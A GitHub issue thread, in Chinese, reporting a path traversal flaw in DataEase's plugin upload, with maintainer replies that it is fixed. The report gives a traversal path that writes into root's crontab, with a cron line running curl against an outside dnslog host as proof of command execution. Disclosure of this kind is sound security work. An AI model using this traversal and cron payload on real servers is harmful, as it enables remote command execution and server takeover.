### ISSUE TITLE
跨目录上传文件控制服务器执行命令[Bug]

### ISSUE THREAD

**Issue by hbdxmz** [dataease/dataease#5559]
**DataEase 版本**
最新版

**运行方式：安装包运行**

**Bug 描述**
跨目录上传文件控制服务器执行命令

**Bug 重现步骤**

1. 更新插件的controller
 https://github.com/dataease/dataease/blob/dev/backend/src/main/java/io/dataease/controller/sys/SysPluginController.java
![image](https://github.com/dataease/dataease/assets/94107024/d75ee562-5067-4a42-b87f-fce2eaae1c3c)

2. 插件上传处理方法
https://github.com/dataease/dataease/blob/dev/backend/src/main/java/io/dataease/commons/utils/DeFileUtils.java
![image](https://github.com/dataease/dataease/assets/94107024/f2e6804d-a024-46c3-8394-391a7a69c45e)

3 由于没有对文件名合法性做校验，导致可以通过../目录跳转符号将文件上传到其他目录，可以将要执行的系统命令上传到定时任务中，用于控制服务器执行命令

4 文件上传后存放在 /opt/dataease/plugins/temp/ 目录
![image](https://github.com/dataease/dataease/assets/94107024/4d3aacfa-2d7c-4532-8a9c-20ce206bd9f7)

5 通过五个目录跳转符进入根目录，再将文件传到var/spool/cron/crontabs/root中的定时任务，
/../../../../../var/spool/cron/crontabs/root ，这里上传文件内容*  *  *  *  *   /usr/bin/curl http://uoyv69.dnslog.cn
![image](https://github.com/dataease/dataease/assets/94107024/995c95d4-3810-40bb-b055-962e00907dfe)

6 在服务器查看定时任务，已经成功传入了攻击者上传的命令
![image](https://github.com/dataease/dataease/assets/94107024/750776b4-a394-4d1d-907f-88623055485d)

7 此处还有一个bug，更新插件前会先将插件卸载
![image](https://github.com/dataease/dataease/assets/94107024/cdf6c275-e9fe-4882-88f9-8d88552e15dc)

即使中途更新失败，但是插件还是会被删除，如果再次更新，插件已经被删除了
![image](https://github.com/dataease/dataease/assets/94107024/7a3d2d6d-fd24-4a48-9744-2b49543aeec1)

应该做成一个事务，如果中途更新失败就回滚操作

建议：对其他上传功能的代码做同类型问题排查，校验上传文件的文件名、后缀、文件内容是否符合预期

**Comment by BBchicken-9527** [comment]
感谢反馈，我们修复一下

**Comment by BBchicken-9527** [comment]
目前问题已修复，可以下载最新版本体验，感谢你的建议与支持；
